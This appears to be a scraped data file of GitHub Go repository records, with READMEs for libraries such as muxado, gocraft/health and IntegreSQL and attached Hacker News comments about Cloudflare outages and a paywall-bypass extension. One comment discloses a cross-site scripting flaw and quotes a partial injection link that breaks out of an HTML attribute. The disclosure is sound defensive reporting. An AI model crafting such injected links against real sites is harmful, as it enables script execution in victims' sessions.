$ `go install ./cmd/webrpc-gen`\n\n\n## Writing your own code-generator\n\nSee [webrpc-gen documentation](./gen).\n\n\n# Authors\n\n* [Peter Kieltyka](https://github.com/pkieltyka)\n* [Jos\u00e9 Carlos Nieto](https://github.com/xiam)\n* [Vojtech Vitek](https://github.com/VojtechVitek)\n* ..and full list of [contributors](https://github.com/webrpc/webrpc/graphs/contributors)!\n\n\n# Credits\n\n* [Twirp authors](https://github.com/twitchtv/twirp) for making twirp. Much of the webrpc-go\nlibrary comes from the twirp project.\n* [gRPC authors](https://grpc.io), for coming up with the overall architecture and patterns\nfor code-generating the bindings between client and server from a common IDL.\n\n\n# License\n\nMIT\n", "readme_type": "markdown", "hn_comments": "A WebRTC pre-compiled library for Android reflects the recent WebRTC updates to facilitate real-time video chat using functional UI components, Kotlin extensions for Android, and Compose.In this article, you'll learn concepts of WebRTC and how to build an Android video application by breaking down WebRTC in Jetpack Compose.Doesn't build or run for me on any of the computers i try it. Is there a way to have a Docker container for that? Also, if i do the http(s) offload with nginx to redirect on it's 8080 port, will the rest work with appropriate ports open?\nYou can contact me on Telegram @codeda, i am willing to pay for the Dockerfile for it.I use Efficientdet and Websockets. On the LAN, WS can give subsecond latency quite easily.Unfortunately I don't have a learning accelerator or dedicated NVR machine, so I'm just using tricks like only decoding keyframes and running inference on those, but only if I've detected motion.I'd really like to do more with image recognition, edge computing surveillance has a lot of of potential to help people who don't trust the cloud solutions.Neat. But that 93% confidence in the \"bus\" is one of the things that bugs me about AI / NN.Very very nicely done. Elegant solution.The webrtc-rs team has been doing an amazing job.I have been experimenting with using it on mobile. We have a audio+video build that is only 1.7Mb, totally not possible with other stacks.Much needed thank you for doing gods work.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "inconshreveable/muxado", "link": "https://github.com/inconshreveable/muxado", "tags": [], "stars": 515, "description": "Stream multiplexing for Go", "lang": "Go", "repo_lang": "", "readme": "# muxado - Stream multiplexing for Go [![godoc reference](https://godoc.org/github.com/inconshreveable/muxado?status.png)](https://godoc.org/github.com/inconshreveable/muxado)\n\nmuxado implements a general purpose stream-multiplexing protocol. muxado allows clients applications\nto multiplex any io.ReadWriteCloser (like a net.Conn) into multiple, independent full-duplex byte streams.\n\nmuxado is a useful protocol for any two communicating processes. It is an excellent base protocol\nfor implementing lightweight RPC. It eliminates the need for custom async/pipeling code from your peers\nin order to support multiple simultaneous inflight requests between peers. For the same reason, it also\neliminates the need to build connection pools for your clients. It enables servers to initiate streams\nto clients without building any NAT traversal. 
muxado can also yield performance improvements (especially\nlatency) for protocols that require rapidly opening many concurrent connections.\n\nmuxado's API is designed to make it seamless to integrate into existing Go programs. muxado.Session\nimplements the net.Listener interface and muxado.Stream implements net.Conn.\n\n## Example\n\nHere's an example client which responds to simple JSON requests from a server.\n\n```go\n conn, _ := net.Dial(\"tcp\", \"example.net:1234\")\n sess := muxado.Client(conn)\n for {\n stream, _ := sess.Accept()\n go func(str net.Conn) {\n defer str.Close()\n var req Request\n json.NewDecoder(str).Decode(&req)\n response := handleRequest(&req)\n json.NewEncoder(str).Encode(response)\n }(stream)\n }\n```\n\nMaybe the client wants to make a request to the server instead of just responding. This is easy as well:\n\n```go\n stream, _ := sess.Open()\n req := Request{\n Query: \"What is the meaning of life, the universe and everything?\",\n }\n json.NewEncoder(stream).Encode(&req)\n var resp Response\n json.dec.Decode(&resp)\n if resp.Answer != \"42\" {\n panic(\"wrong answer to the ultimate question!\")\n }\n```\n\n## Terminology\nmuxado defines the following terms for clarity of the documentation:\n\nA \"Transport\" is an underlying stream (typically TCP) that is multiplexed by sending frames between muxado peers over this transport.\n\nA \"Stream\" is any of the full-duplex byte-streams multiplexed over the transport\n\nA \"Session\" is two peers running the muxado protocol over a single transport\n\n## Implementation Design\nmuxado's design is influenced heavily by the framing layer of HTTP2 and SPDY. However, instead\nof being specialized for a higher-level protocol, muxado is designed in a protocol agnostic way\nwith simplicity and speed in mind. More advanced features are left to higher-level libraries and protocols.\n\n## Extended functionality\nmuxado ships with two wrappers that add commonly used functionality. The first is a TypedStreamSession\nwhich allows a client application to open streams with a type identifier so that the remote peer\ncan identify the protocol that will be communicated on that stream.\n\nThe second wrapper is a simple Heartbeat which issues a callback to the application informing it\nof round-trip latency and heartbeat failure.\n\n## Performance\nXXX: add perf numbers and comparisons\n\nAny stream-multiplexing library over TCP will suffer from head-of-line blocking if the next packet to service gets dropped.\nmuxado is also a poor choice when sending many large payloads concurrently.\nIt shines best when the application workload needs to quickly open a large number of small-payload streams.\n\n## Status\nMost of muxado's features are implemented (and tested!), but there are many that are still rough or could be improved. 
See the TODO file for suggestions on what needs to improve.\n\n## License\nApache\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cloudflare/pint", "link": "https://github.com/cloudflare/pint", "tags": ["prometheus", "metrics", "linter", "observability", "validator"], "stars": 515, "description": "Prometheus rule linter/validator", "lang": "Go", "repo_lang": "", "readme": "---\nnav_exclude: true\n---\n\n# pint\n\npint is a Prometheus rule linter.\n\nYou can find [online docs](https://cloudflare.github.io/pint/) on GitHub Pages.\n\nAlternatively you can read raw Markdown documentation [here](/docs/index.md):\n\nChangelog is kept at [docs/changelog.md](/docs/changelog.md).\n\nCheck [examples](/docs/examples) dir for sample config files.\n", "readme_type": "markdown", "hn_comments": "adrien from updown.io here.Sorry about this, I still don't have any answer or explanation from Vultr or CloudFlare at this point. Most likely cause IMO is that CloudFlare (accidentally?) blocked one or many big ranges of IPs belonging to Vultr (and maybe some other providers as people seems to say Vultr was not the only impacted). I noticed during the incident this morning for example that I could ping CloudFlare IPv6 (ICMP) but not connect through TCP (port 443). So this sounds more like a firewall than a routing issue from what I could see.I'll update once I have anything else in https://status.updown.io/issue/1e196616-1368-43a0-8c04-82cff.... For the moment I'm keeping the mitigation in place just in case.If you have more details about this from CloudFlare or elsewhere I'll be happy to hear it :)Issue seems to be resolved now: https://status.appbeat.io/same for me :/ since 1:41 CET\nhttps://status.ioverlander.com/Yeah, I just woke up to some alerts, too. Sometimes I get the feeling people don't take IPv6 seriously!oh, so that's why I have 200 emails in my inbox? I use the same combo: updown.io and cloudflare. can it be related to updown.io?I have a personal monitoring system (uptime kuma) running on Hetzner (Germany data center) and since around 5am UTC today I am seeing intermittent timeouts only on services proxied by cloudflare so not just Vultr affected it seems\u2026Startups can create alternatives to those services. Then get bought out by one of the big tech companies like Microsoft or Google. Don't be afraid to compete as long as yours is cheaper and better quality.The Microsoft Windows Empire upsets me because businesses depend on it and Windows 10/11 updates take too long and mess up device drivers and programs.That's cool and all, but I'm probably going to make something to hide it. I also hate paywalls, but (almost) all of them are so easy to circumvent that I usually do it in the inspector.Does anyone remember \"BugMeNot\" ?OK, I need to inquire about `passTheButter()`. A hat tip to \"GreasyFork\"? Or perhaps this is about \"sliding\" past the paywalls?Heads up this is vulnerable to cross site scripting [1]. If someone submits a link like: https://example.com\">\n\nThen simply viewing the hackernews index page with this extension installed will let the submitter execute whatever javascript they want in your logged in hackernews context - no user interaction necessary.[1]: https://github.com/MostlyEmre/hn-anti-paywall/blob/main/scri...This feels very ethically icky to me. 
Folks are working hard to write these articles, and need to get paid.If you don\u2019t like paywalled articles just don\u2019t read them, I don\u2019t think it\u2019s ethically sound to do this.Just my $0.02Needs to show a project license. Otherwise, pretty cool!Imo these types of thing while probably appreciated by many lead to cat-and-mouse games and probably ultimately to hard-paywalls being more widely adopted (I see them a lot already in fact). So what happens then? The utility of these paywall bypass options diminishes until there\u2019s little of value left behind soft-paywallsThere a \u201cmetadata section\u201d on HN submissions?should be the defaultCloudflare offers a lot of stuff, if you mean compete on DDOS protection, you best case is host-provider DDOA protection, which won't MITM connections.Gatekeeper ?https://github.com/AltraMayor/gatekeeper/wikiBen Thompson has analyzed in his blog how Cloudflare applied the Disruptive Innovation model - https://stratechery.com/2021/cloudflares-disruption/. The CTO of Cloudflare sort of acknowledged that on HN back then - https://news.ycombinator.com/item?id=28708371There must be new niches (\"value networks\" as per that blog) that Cloudflare finds not worthwhile to serve. Usually they're at the lower end or the \"nonconsumption\" case, as described in the above blog post. That's one way to chip away at a bit of their customer base.But it's best to just focus on customers and not imagine you're \"competing with Cloudflare\". Nothing to be gained by framing it that way.I don\u2019t understand why people are so up in arms about Cloudflare being a MITM, but not e.g. AWS API Gateway being a MITM.Best way to compete with Cloudflare is to use decentralized cloud storage options, that are compatible with S3, cheaper, and faster \u2013 like storj.ioFrom Netlify: Hey everyone, this was definitely an issue on our side. We were testing an internal change to our routing mechanism and returned a testing message for some of the requests. Unfortunately, in a subset of CDN locations, for customers on our regular network (not HP Edge) that have a proxy in front of Netlify, those test responses were routed through their proxy. That meant that these test responses were cached there and served instead of the corresponding asset.Not cool to post with a title slamming Cloudflare when you admit at the bottom of the post it may not be them. Until you are sure where the fault is, best not to start making accusations.We had the same issue today. Isolated several variables and confirmed it only happens when caching Netlify sites through Cloudflare. It replaced not only our CSS file, but all cached assets included our homepage, images, videos, .js files... Took down our entire site and the only way to fix was completely disabling caching through Cloudflare. Seems like to me that it is a Netlify issue that is responding incorrectly specifically to CF's servers, but it's also possible it's a Cloudflare issue. We literally just moved our entire site over to a backup server temporarily until we can get it figured out.https://answers.netlify.com/t/javascript-and-css-assets-spor...confirmed to be a netlify issue and should be resolvedOpen a ticket. Could be a bug on their end or an issue on yours.I'm having this same issue and have a ticket open with cloudflare enterprise support -- started this morning just after cloudflare performed maintenance on their DNS. No response from ENT support yet.Opening a ticket with netlify too. 
for now i've simply put a cloudflare page rule up to bypass cache.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tj/go-spin", "link": "https://github.com/tj/go-spin", "tags": [], "stars": 515, "description": "Terminal spinner package for Golang", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gocraft/health", "link": "https://github.com/gocraft/health", "tags": [], "stars": 515, "description": "Instrument your web apps with logging and metrics", "lang": "Go", "repo_lang": "", "readme": "# gocraft/health [![GoDoc](https://godoc.org/github.com/gocraft/health?status.png)](https://godoc.org/github.com/gocraft/health)\n\ngocraft/health allows you to instrument your service for logging and metrics, and then send that instrumentation to log files, StatsD, Bugsnag, or to be polled and aggregated via a JSON API.\n\ngocraft/health also ships with a New Relic-like aggregator (called healthd) that shows you your slowest endpoints, top error producers, top throughput endpoints, and so on.\n\n## Instrumenting your service\n\n### Make a new stream with sinks\n\nFirst, you'll want to make a new Stream and attach your sinks to it. Streams are commonly saved in a global variable.\n\n```go\nimport (\n\t\"github.com/gocraft/health\"\n\t\"github.com/gocraft/health/sinks/bugsnag\"\n\t\"os\"\n)\n\n// Save the stream as a global variable\nvar stream = health.NewStream()\n\n// In your main func, initialize the stream with your sinks.\nfunc main() {\n\t// Log to stdout! (can also use WriterSink to write to a log file, Syslog, etc)\n\tstream.AddSink(&health.WriterSink{os.Stdout})\n\n\t// Log to StatsD!\n\tstatsdSink, err := health.NewStatsDSink(\"127.0.0.1:8125\", \"myapp\")\n\tif err != nil {\n\t\tstream.EventErr(\"new_statsd_sink\", err)\n\t\treturn\n\t}\n\tstream.AddSink(statsdSink)\n\n\t// Expose instrumentation in this app on a JSON endpoint that healthd can poll!\n\tsink := health.NewJsonPollingSink(time.Minute, time.Minute*5)\n\tstream.AddSink(sink)\n\tsink.StartServer(addr)\n\n\t// Send errors to bugsnag!\n\tstream.AddSink(bugsnag.NewSink(&bugsnag.Config{APIKey: \"myApiKey\"}))\n\n\t// Now that your stream is setup, start a web server or something...\n}\n```\n\n### Jobs\n\ngocraft/health excels at instrumenting services that perform *jobs*. Examples of jobs: serving an HTTP request, serving an RPC request, or processing a message from a work queue. Jobs are encoded semantically into gocraft/health in order to provide out-of-the-box answers to questions like, \"what is my slowest endpoint?\"\n\nJobs serve three functions:\n* Jobs record a timing (eg, it took 21ms to complete this job)\n* Jobs record a status (eg, did the job complete successfully or was there an error?)\n* Jobs group instrumentation inside that job together so that you can analyze it later.\n\nLet's say you're writing a web service that processes JSON requests/responses.
You might write something like this:\n\n```go\nimport (\n\t\"github.com/gocraft/health\"\n\t\"net/http\"\n)\nvar stream = health.NewStream()\nfunc main() {\n\t// setup stream with sinks\n\tstream.AddSink(&health.WriterSink{os.Stdout})\n\thttp.HandleFunc(\"/users\", getUsers)\n}\n\nfunc getUsers(rw http.ResponseWriter, r *http.Request) {\n\t// All logging and instrumentation should be within the context of a job!\n\tjob := stream.NewJob(\"get_users\")\n\n\terr := fetchUsersFromDatabase(r)\n\tif err != nil {\n\t\t// When in your job's context, you can log errors, events, timings, etc.\n\t\tjob.EventErr(\"fetch_user_from_database\", err)\n\t}\n\n\t// When done with the job, call job.Complete with a completion status.\n\tif err == nil {\n\t\tjob.Complete(health.Success)\n\t} else {\n\t\tjob.Complete(health.Error)\n\t}\n}\n\n```\n\n(This example is just used for illustration -- in practice, you'll probably want to use middleware to create your job if you have more than a few endpoints.)\n\nThere are five types of completion statuses:\n* **Success** - Your job completed successfully.\n* **Error** - Some library call resulted in an error that prevented you from successfully completing your job.\n* **Panic** - Some code paniced!\n* **ValidationError** - Your code was fine, but the user passed in bad inputs, and so the job wasn't completed successfully.\n* **Junk** - The job wasn't completed successfully, but not really because of an Error or ValidationError. For instance, maybe there's just a 404 (not found) or 401 (unauthorized) request to your app. This status code might not apply to all apps.\n\n### Events, Timings, Gauges, and Errors\n\nWithin jobs, you can emit events, timings, gauges, and errors. The first argument of each of these methods is supposed to be a *key*. Camel case with dots is good because it works with other metrics stores like StatsD. Each method has a basic version as well as a version that accepts keys/values.\n\n#### Events\n\n```go\n// Events. 
Notice the camel case with dots.\n// (This is helpful when you want to use StatsD sinks)\njob.Event(\"starting_server\")\njob.Event(\"proccess_user.by_email.gmail\")\n\n// Event with keys and values:\njob.EventKv(\"failover.started\", health.Kvs{\"from_ip\": fmt.Sprint(currentIP)})\n```\n\n* For the WriterSink, an event is just like logging to a file:\n```\n[2015-03-11T22:53:22.115855203Z]: job:/api/v2/user_stories event:starting_request kvs:[path:/api/v2/user_stories request-id:F8a8bQOWmRpO6ky]\n```\n\n* For the StatsD sink (and other metrics sinks), an event is like incrementing a counter.\n\n#### Timings\n\n```go\n// Timings:\nstartTime := time.Now()\n// Do something...\njob.Timing(\"fetch_user\", time.Since(startTime).Nanoseconds()) // NOTE: Nanoseconds!\n\n// Timings also support keys/values:\njob.TimingKv(\"fetch_user\", time.Since(startTime).Nanoseconds(),\n\thealth.Kvs{\"user_email\": userEmail})\n```\n\n* NOTE: All timing values are in nanoseconds.\n* For the WriterSink, a timing is just like logging to a file:\n```\n[2014-12-17T20:36:24.136663759Z]: job:/api/v2/user_stories event:dbr.select time:371 \u03bcs kvs:[request-id:F8a8bQOWmRpO6ky sql:SELECT COUNT(*) FROM user_stories WHERE (subdomain_id = 1221) AND (deleted_at IS NULL) AND (ticket_id IN (38327))]\n```\n\n* For the StatsD sink, we'll send it to StatsD as a timing.\n* The JSON polling sink will compute a summary of your timings: min, max, avg, stddev, count, sum.\n\n#### Gauges\n\n```go\n// Gauges:\njob.Gauge(\"num_goroutines\", numRunningGoroutines()) \n\n// Gauges also support keys/values:\njob.GaugeKv(\"num_goroutines\", numRunningGoroutines(),\n\thealth.Kvs{\"dispatcher\": dispatcherStatus()})\n```\n\n* For the WriterSink, a gauge is just like logging to a file:\n```\n[2014-12-17T20:36:24.136663759Z]: job:/api/v2/user_stories event:num_goroutines gauge:17 kvs:[request-id:F8a8bQOWmRpO6ky dispatcher:running]\n```\n\n* For the StatsD sink, we'll send it to StatsD as a gauge.\n\n#### Errors\n\n```go\n// Errors:\nerr := someFunc(user.Email)\nif err != nil {\n\treturn job.EventErr(\"some_func\", err)\n}\n\n// And with keys/values:\njob.EventErrKv(\"some_func\", err, health.Kvs{\"email\": user.Email})\n```\n\n* For the WriterSink, an error will just log to the file with the error:\n```\njob:/api/v2/user_stories event:load_session.populate err:not_found kvs:[request-id:F8a8bQOWmRpO6ky]\n```\n\n* For metrics sinks, Errors are just like Events\n* The JSON polling sink and healthd will let you see which errors are trending.\n* For the Bugsnag sink, we'll push each error to bugsnag.\n\nErrors will capture a stacktrace by default so that you can diagnose it in things like Bugsnag. If an error is common or not worth sending to something like Bugsnag, you can mute it. This will cause health to not capture a stack trace or send it to bugsnag:\n\n```go\ni, err := strconv.ParseInt(userInput, 10, 0)\nif err != nil {\n\t// Mute this error! It's pretty common and\n\t// does not indicate a problem with our code!\n\tjob.EventErr(\"myfunc.parse_int\", health.Mute(err))\n\ti = 2 // We have a default anyway. No big deal.\n}\n```\n\nSince error handling is so prevalent in Go code, you'll have situations where multiple functions have the option of logging the same root error. The best practice that we've identified is to just not think about it and log it on every level of the call stack.
Keep in mind that gocraft/health will handle this intelligently and only send one error to Bugsnag, have a correct root backtrace, and so on.\n\n```go\nfunc showUser(ctx *Context) error {\n\tuser, err := ctx.getUser()\n\tif err != nil {\n\t\t// But we'll just log it here too!\n\t\treturn ctx.EventErr(\"show_user.get_user\", err)\n\t}\n}\n\nfunc getUser(ctx *Context) (*User, error) {\n\tvar u User\n\terr := ctx.db.Select(\"SELECT * FROM users WHERE id = ?\", ctx.userID).LoadStruct(&u)\n\tif err != nil {\n\t\t// Original error is here:\n\t\treturn nil, ctx.EventErr(\"get_user.select\", err)\n\t}\n\treturn &u, nil\n}\n```\n\n### Keys and Values\n\nMost objects and methods in health work with key/value pairs. Key/value pairs are just maps of strings to strings. Keys and values are only relevant right now for logging sinks: The keys and values will be printed on each line written.\n\nYou can add keys/values to a stream. This is useful for things like hostname or pid. They keys/values will show up on every future event/timing/error.\n```go\nstream := health.NewStream()\nstream.KeyValue(\"hostname\", hostname)\nstream.KeyValue(\"pid\", pid)\n```\n\nYou can add keys/values to a job. This is useful for things like a request-id or the current user id:\n```go\njob.KeyValue(\"request_id\", makeRequestID())\nif user != nil {\n\tjob.KeyValue(\"user_id\", fmt.Sprint(user.ID))\n}\n```\n\nAnd as previously discussed, each individual event/timing/error can have its own keys and values.\n\n### Writing your own Sink\n\nIf you need a custom sink, you can just implement the Sink interface:\n\n```go\ntype Sink interface {\n\tEmitEvent(job string, event string, kvs map[string]string)\n\tEmitEventErr(job string, event string, err error, kvs map[string]string)\n\tEmitTiming(job string, event string, nanoseconds int64, kvs map[string]string)\n\tEmitGauge(job string, event string, value float64, kvs map[string]string)\n\tEmitComplete(job string, status CompletionStatus, nanoseconds int64, kvs map[string]string)\n}\n```\n\nIf you do implement a custom sink that you think would be valuable to other people, I'd be interested in including it in this package. Get in touch via an issue or send a pull requset.\n\n### Miscellaneous logging\n\nIf you need to, you can log via a stream directly without creating a job. This will emit events under a job named 'general'. This is useful during application initialization:\n\n```go\nstream := NewStream()\nstream.EventKv(\"starting_app\", health.Kvs{\"listen_ip\": listenIP})\n```\n\n## healthd and healthtop\n\nWe've built a set of tools to give you New Relic-like application performance monitoring for your Go app. It can show you things like your slowest endpoints, top error producers, top throughput endpoints, and so on.\n\nThese tools are completely optional -- health is super useful without them. But with them, it becomes even better.\n\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop.png)\n\n### Add a JsonPollingSink to your stream\n\n```go\n// Make sink and add it to stream:\nsink := health.NewJsonPollingSink(time.Minute, time.Minute*5)\nstream.AddSink(sink)\n\n// Start the HTTP server! 
This will expose metrics via a JSON API.\n// NOTE: this won't interfere with your main app (if it also serves HTTP),\n// since it starts a separate net/http server.\n// In prod, addr should be a private network interface and port, like \"10.2.1.4:5020\"\n// In local dev, it can be something like \"127.0.0.1:5020\"\nsink.StartServer(addr)\n```\n\nOnce you start your app, you can browse to ```/health``` endpoint (eg, ```127.0.0.1:5020/health```) to see your metrics. Per the initialization options above, your metrics are aggregated in 1-minute chunks. We'll keep 5 minutes worth of data in memory. Nothing is ever persisted to disk.\n\n\n### Start healthd\n\nhealthd will poll multiple services that are exposing a ```/health``` endpoint and aggregate that data. It will then expose that data via its own JSON API. You can query the healthd API to answer questions like 'what are my slowest endpoints'?\n\nInstall the healthd binary:\n\n```bash\ngo get github.com/gocraft/health/cmd/healthd\n```\n\nNow you can run it. It accepts two main inputs as environment variables:\n\n* **HEALTHD_MONITORED_HOSTPORTS**: comma separated list of hostports that represent your services running the JsonPollingSink. Example: ```HEALTHD_MONITORED_HOSTPORTS=10.18.23.130:5020,10.18.23.131:5020```\n* **HEALTHD_SERVER_HOSTPORT**: interface and port where you want to expose the healthd endpoints. Example: ```HEALTHD_SERVER_HOSTPORT=10.18.23.132:5032```\n\nPutting those together:\n```bash\nHEALTHD_MONITORED_HOSTPORTS=10.18.23.130:5020,10.18.23.131:5020 HEALTHD_SERVER_HOSTPORT=10.18.23.132:5030 healthd\n```\n\nOf course, in local development mode, you can do something like this:\n```bash\nHEALTHD_MONITORED_HOSTPORTS=:5020 HEALTHD_SERVER_HOSTPORT=:5032 healthd\n```\n\nGreat! To get a sense of the type of data healthd serves, you can manually navigate to:\n\n* ```/jobs```: Lists top jobs \n* ```/aggregations```: Provides a time series of aggregations\n* ```/aggregations/overall```: Squishes all time series aggregations into one aggregation.\n* ```/hosts```: Lists all monitored hosts and their statuses.\n\nHowever, viewing raw JSON is just to give you a sense of the data. See the next section...\n\n### Use healthtop to query healthd\n\nhealthtop is a command-line tool that repeatedly queries a healthd and displays the results.\n\nInstall the healthtop binary:\n\n```bash\ngo get github.com/gocraft/health/cmd/healthtop\n```\n\nSee your top jobs:\n\n```bash\nhealthtop jobs\n```\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop.png)\n\n(By default, healthop will query healthd on localhost:5032 -- if this is not the case, you can use the source option: ```healthtop --source=10.28.3.132:5032 jobs```)\n\nYou can sort your top jobs by a variety of things:\n\n```bash\n$ healthtop jobs --sort\nError: flag needs an argument: --sort\nUsage of jobs:\n -h, --help=false: help for jobs\n --name=\"\": name is a partial match on the name\n --sort=\"name\": sort \u2208 {name, count, count_success, count_XXX, min, max, avg}\n --source=\"localhost:5032\": source is the host:port of the healthd to query. ex: localhost:5031\n\n$ healthtop jobs --sort=count_error\n```\n\n\nSee your hosts:\n\n```bash\nhealthtop hosts\n```\n\n![Healthtop Screenshot](https://gocraft.github.io/health/images/healthtop_hosts.png)\n\nTo get help:\n\n```bash\nhealthtop help\n```\n\n## Current Status and Contributing\n\nCurrently, the core instrumentation component is very solid. Healthd is good. 
healthtop is functional but could use some love.\n\nRequest for contributions:\n\nhealth core:\n\n* A way to do fine-grained histograms with variable binning.\n\nhealthd & healthtop\n\n* A web UI that is built into healthd\n* Keep track of multiple service types so that we can use one healthd to monitor multiple types of applications\n* Ability to drill into specific jobs to see top errors\n* tests\n* general love\n\nIf anything here interests you, let me know by opening an issue and we can collaborate on it.\n\n## gocraft\n\ngocraft offers a toolkit for building web apps. Currently these packages are available:\n\n* [gocraft/web](https://github.com/gocraft/web) - Go Router + Middleware. Your Contexts.\n* [gocraft/dbr](https://github.com/gocraft/dbr) - Additions to Go's database/sql for super fast performance and convenience.\n* [gocraft/health](https://github.com/gocraft/health) - Instrument your web apps with logging and metrics.\n* [gocraft/work](https://github.com/gocraft/work) - Process background jobs in Go.\n\nThese packages were developed by the [engineering team](https://eng.uservoice.com) at [UserVoice](https://www.uservoice.com) and currently power much of its infrastructure and tech stack.\n\n## Authors\n\n* Jonathan Novak -- [https://github.com/cypriss](https://github.com/cypriss)\n* Sponsored by [UserVoice](https://eng.uservoice.com)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "allaboutapps/integresql", "link": "https://github.com/allaboutapps/integresql", "tags": ["golang", "go", "postgres", "postgresql", "server", "integration-testing", "id-allaboutapps-backend"], "stars": 515, "description": "IntegreSQL manages isolated PostgreSQL databases for your integration tests.", "lang": "Go", "repo_lang": "", "readme": "# IntegreSQL\r\n\r\n`IntegreSQL` manages isolated PostgreSQL databases for your integration tests.\r\n\r\nDo your engineers a favour by allowing them to write fast executing, parallel and deterministic integration tests utilizing **real** PostgreSQL test databases. Resemble your live environment in tests as close as possible. 
\r\n\r\n[![](https://img.shields.io/docker/image-size/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![](https://img.shields.io/docker/pulls/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![Docker Cloud Build Status](https://img.shields.io/docker/cloud/build/allaboutapps/integresql)](https://hub.docker.com/r/allaboutapps/integresql) [![](https://goreportcard.com/badge/github.com/allaboutapps/integresql)](https://goreportcard.com/report/github.com/allaboutapps/integresql) ![](https://github.com/allaboutapps/integresql/workflows/build/badge.svg?branch=master)\r\n\r\n- [IntegreSQL](#integresql)\r\n - [Background](#background)\r\n - [Approach 0: Leaking database mutations for subsequent tests](#approach-0-leaking-database-mutations-for-subsequent-tests)\r\n - [Approach 1: Isolating by resetting](#approach-1-isolating-by-resetting)\r\n - [Approach 2a: Isolation by transactions](#approach-2a-isolation-by-transactions)\r\n - [Approach 2b: Isolation by mocking](#approach-2b-isolation-by-mocking)\r\n - [Approach 3a: Isolation by templates](#approach-3a-isolation-by-templates)\r\n - [Approach 3b: Isolation by cached templates](#approach-3b-isolation-by-cached-templates)\r\n - [Approach 3c: Isolation by cached templates and pool](#approach-3c-isolation-by-cached-templates-and-pool)\r\n - [Approach 3c benchmark 1: Baseline](#approach-3c-benchmark-1-baseline)\r\n - [Approach 3c benchmark 2: Small project](#approach-3c-benchmark-2-small-project)\r\n - [Final approach: IntegreSQL](#final-approach-integresql)\r\n - [Integrate by client lib](#integrate-by-client-lib)\r\n - [Integrate by RESTful JSON calls](#integrate-by-restful-json-calls)\r\n - [Demo](#demo)\r\n - [Install](#install)\r\n - [Install using Docker (preferred)](#install-using-docker-preferred)\r\n - [Install locally](#install-locally)\r\n - [Configuration](#configuration)\r\n - [Usage](#usage)\r\n - [Run using Docker (preferred)](#run-using-docker-preferred)\r\n - [Run locally](#run-locally)\r\n - [Contributing](#contributing)\r\n - [Development setup](#development-setup)\r\n - [Development quickstart](#development-quickstart)\r\n - [Maintainers](#maintainers)\r\n - [License](#license)\r\n\r\n## Background\r\n\r\nWe came a long way to realize that something just did not feel right with our PostgreSQL integration testing strategies.\r\nThis is a loose summary of how this project came to life.\r\n\r\n### Approach 0: Leaking database mutations for subsequent tests\r\n\r\nTesting our customer backends actually started quite simple:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* Utilizing the same PostgreSQL test database for each test:\r\n * **Run your test code** \r\n* Test runner ends\r\n\r\nIt's quite easy to spot the problem with this approach. Data may be mutated by any single test and is visible from all subsequent tests. 
It becomes cumbersome to make changes in your test code if you can't rely on a clean state in each and every test.\r\n\r\n### Approach 1: Isolating by resetting\r\n\r\nLet's try to fix that like this:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* **Before each** test: \r\n  * Truncate\r\n  * Apply all migrations\r\n  * Seed all fixtures\r\n* Utilizing the same PostgreSQL test database for each test:\r\n  * **Run your test code** \r\n* Test runner ends\r\n\r\nWell, it's now isolated - but testing time has increased by a rather high factor and is totally dependent on your truncate/migrate/seed operations.\r\n\r\n### Approach 2a: Isolation by transactions\r\n\r\nWhat about using database transactions?\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL test database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* **Before each** test: \r\n  * Start a new database transaction\r\n* Utilizing the same PostgreSQL test database for each test:\r\n  * **Run your test code** \r\n* **After each** test:\r\n  * Rollback the database transaction\r\n* Test runner ends\r\n\r\nAfter spending considerable time rewriting all your code to actually use the injected database transaction everywhere, you realize that nested transactions are not supported and can only be poorly emulated using savepoints. All database transaction specific business code, especially its potential error states, is not properly testable this way. You therefore ditch this approach.\r\n\r\n### Approach 2b: Isolation by mocking\r\n\r\nWhat about using database mocks?\r\n\r\n* Test runner starts\r\n* Utilizing an in-memory mock database isolated for each test:\r\n  * **Run your test code** \r\n* Test runner ends\r\n\r\nI'm generally not a fan of emulating database behavior through a mocking layer while testing/implementing. Even minor version changes of PostgreSQL plus its extensions (e.g. PostGIS) may introduce slight differences, e.g. how indices are used, function deprecations, query planner, etc.
It might not even be an erroneous result, just performance regressions or slight sorting differences in the returned query result.\r\n\r\nWe try to approximate local/test and live as closely as possible, therefore using the same database, with the same extensions in their exact same version is a hard requirement for us while implementing/testing locally.\r\n\r\n### Approach 3a: Isolation by templates\r\n\r\nWe discovered that using [PostgreSQL templates](https://supabase.com/blog/2020/07/09/postgresql-templates) and creating the actual new test database from them is quite fast, so let's do this:\r\n\r\n* Test runner starts\r\n* Recreate a PostgreSQL template database\r\n* Apply all migrations\r\n* Seed all fixtures\r\n* **Before each** test: \r\n  * Create a new PostgreSQL test database from our already migrated/seeded template database\r\n* Utilizing a new isolated PostgreSQL test database for each test:\r\n  * **Run your test code** \r\n* Test runner ends\r\n\r\nWell, we are up in speed again, but we can still do better, how about...\r\n\r\n### Approach 3b: Isolation by cached templates\r\n\r\n* Test runner starts\r\n* Check migrations/fixtures have changed (hash over all related files)\r\n  * Yes\r\n    * Recreate a PostgreSQL template database\r\n    * Apply all migrations\r\n    * Seed all fixtures\r\n  * No, nothing has changed\r\n    * Simply reuse the previous PostgreSQL template database\r\n* **Before each** test: \r\n  * Create a new PostgreSQL test database from our already migrated/seeded template database\r\n* Utilizing a new isolated PostgreSQL test database for each test:\r\n  * **Run your test code** \r\n* Test runner ends\r\n\r\nThis gives a significant speed bump as we no longer need to recreate our template database if no files related to the database structure or fixtures have changed. However, we still need to create a new PostgreSQL 